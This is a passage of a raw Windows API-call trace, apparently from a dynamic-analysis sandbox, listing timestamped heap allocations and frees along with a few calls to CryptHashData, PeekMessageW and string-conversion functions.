Flags=0x0, Size=0x4) returned 0x2e54e88 [0144.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0144.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e50a88 [0144.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50a88, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0144.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0144.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0144.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0144.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0144.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0144.332] CryptHashData (hHash=0xa87610, pbData=0x2e54e48, dwDataLen=0x3, dwFlags=0x1) returned 1 [0144.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0144.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0144.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0144.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0144.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0144.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0144.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0144.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0144.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0144.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0144.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0144.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0144.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0144.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0144.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0144.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0144.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0144.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0144.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0144.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0144.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0144.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0144.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0144.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0144.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0144.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0144.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0144.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0144.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0144.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0144.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0144.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0144.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0144.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0144.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0144.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0144.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0144.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0144.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0144.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0144.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0144.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0144.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0144.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0144.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0144.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0144.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0144.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0144.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0144.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0144.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0144.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0144.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0144.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0144.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0144.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0144.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0144.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0144.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0144.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0144.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0144.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0144.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0144.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0144.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0144.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0144.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0144.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0144.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0144.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0144.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0144.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0144.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0144.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0144.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0144.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0144.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0144.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0144.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0144.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0144.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0144.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0144.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0144.337] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0144.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0144.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0144.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0144.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0144.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0144.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0144.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0144.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0144.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0144.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0144.337] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0144.338] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0144.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0144.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0144.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0144.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0144.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0144.338] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0144.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0144.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0144.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c20 [0144.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0144.338] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0144.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0144.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0144.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0144.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0144.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0144.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0144.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0144.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0144.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0144.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0144.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0144.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0144.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0144.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0144.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0144.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0144.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0144.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0144.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0144.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0144.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0144.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0144.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0144.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0144.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0144.339] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0144.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0144.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0144.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c20 [0144.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0144.340] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0144.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0144.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0144.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0144.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0144.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0144.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0144.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0144.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0144.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0144.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0144.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0144.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0144.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0144.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0144.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0144.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0144.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0144.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0144.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0144.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0144.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0144.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0144.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0144.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0144.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0144.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0144.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0144.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0144.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0144.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0144.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0144.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0144.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0144.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0144.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0144.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0144.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0144.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0144.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0144.341] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0144.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0144.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0144.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0144.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0144.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0144.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0144.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0144.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0144.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0144.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0144.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0144.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0144.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0144.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0144.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0144.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0144.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0144.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0144.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0144.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0144.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0144.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0144.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0144.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0144.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0144.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0144.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0144.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0144.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0144.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0144.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0144.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0144.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0144.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0144.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0144.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0144.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0144.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0144.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0144.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0144.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0144.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0144.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0144.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0144.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0144.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0144.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0144.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0144.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0144.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0144.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0144.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0144.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: 